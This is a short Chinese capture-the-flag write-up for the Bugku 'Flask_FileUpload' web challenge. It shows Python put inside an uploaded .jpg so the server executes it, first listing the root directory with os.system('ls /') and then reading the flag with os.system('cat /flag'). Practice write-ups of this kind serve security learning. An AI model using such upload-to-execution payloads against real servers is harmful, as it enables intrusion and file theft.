Bugku-web-Flask_FileUpload

黑白时光les2024-08-01 11:52

Bugku-web-Flask_FileUpload

查看源代码,提示用python返回结果

在file.jpg中写python代码

复制代码 
import os
os.system('ls / ')

上传后查看源代码,找到flag文件夹

修改代码

复制代码 
import os
os.system('cat /flag ')
相关推荐
chxii3 分钟前
在 IIS 中实现 SSL 证书的自动续期
前端
周星星日记11 分钟前
vue3中静态提升和patchflag实现
前端·vue.js·面试
飞Link12 分钟前
【AI大模型实战】万字长文肝透大语言模型(LLM):从底层原理解析到企业级Python项目落地
开发语言·人工智能·python·语言模型·自然语言处理
翻斗包菜16 分钟前
第 03 章 Python 操作 MySQL 数据库实战全解
数据库·python·mysql
橘子编程17 分钟前
React 19 全栈开发实战指南
前端·react.js·前端框架
DanCheOo18 分钟前
AI Streaming 架构:从浏览器到服务端的全链路流式设计
前端·agent
我是小趴菜24 分钟前
前端如何让图片、视频、pdf等文件在浏览器直接下载而非预览
前端
xcjbqd028 分钟前
如何修改Oracle服务器默认的日期格式_NLS_DATE_FORMAT全局配置
jvm·数据库·python
cg3328 分钟前
开源项目自动化:用 GitHub Actions 让每个 Issue 都被温柔以待
前端
white-persist38 分钟前
【vulhub spring CVE-2018-1270】CVE-2018-1270 Spring Messaging 远程命令执行漏洞 完整复现详细分析解释
java·服务器·网络·数据库·后端·python·spring
热门推荐
01一周AI热点速览(2026.03.31-04.06):GPT-6曝光、谷歌开源Gemma 4、资本狂飙与模型军备竞赛022026年4月技术前沿:AI大模型爆发、智能体革命与量子安全新纪元03GitHub 镜像站点04基于 Docker 部署 Hermes Agent 并接入飞书机器人的完整指南05AI Weekly | 2026年4月第二周 · GitHub热门项目与AI发展趋势深度解析06免费!不限量!用opencode接入英伟达(NVIDIA)大模型,轻松打造你的 AI 编程助手07Oh My Codex 快速使用指南08VMware Workstation Pro 17 虚拟机完整安装教程(2026最新)09OpenClaw 请求超时 llm request timed out 怎么解决?3 种方案实测,附完整排查流程10CodeBuddy与WorkBuddy深度对比:腾讯两款AI工具差异及实操指南